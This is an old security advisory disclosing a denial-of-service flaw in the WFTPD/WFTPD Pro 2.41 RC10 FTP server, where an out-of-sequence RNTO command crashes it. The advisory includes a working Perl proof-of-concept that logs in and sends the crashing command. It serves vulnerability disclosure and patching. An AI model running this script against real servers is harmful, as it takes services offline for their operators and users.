WFTPD/WFTPD Pro 2.41 RC10 denial-of-service

[bluepanda () DWARF BOX SK (Blue Panda)]

================================================================
BluePanda Vulnerability Announcement: WFTPD/WFTPD Pro 2.41 RC10
11/07/2000 (dd/mm/yyyy)

bluepanda () dwarf box sk
http://bluepanda.box.sk/
================================================================

Problem: An out of sequence RNTO command will cause WFTPD to crash.
Vendor status: Notified.
Vulnerable: WFTPD/WFTPD Pro 2.41 RC10, and prior.
Immune: WFTPD/WFTPD Pro 2.41 RC11.

==========
Details:
==========

Anyone with a valid user/pass combination for a WFTPD server can cause it
to
terminate abnormally by issuing an RNTO command without first using RNFR.

===================
Proof of concept:
===================

#!/usr/bin/perl
#
# WFTPD/WFTPD Pro 2.41 RC10 denial-of-service
# Blue Panda - bluepanda () dwarf box sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Issues an RNTO command without first using RNFR, causing WFTPD to crash.
#

use IO::Socket;

$host = "ftp.host.com" ;
$port = "21";
$user = "anonymous";
$pass = "p\@nda";
$wait = 10;

# Connect to server.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "failed.\n";
print "done.\n";

# Login and issue premature RNTO command.
print $socket "USER $user\nPASS $pass\nRNTO x\n";

# Wait a while, just to make sure the commands have arrived.
print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "\nConnection closed. Finished.\n"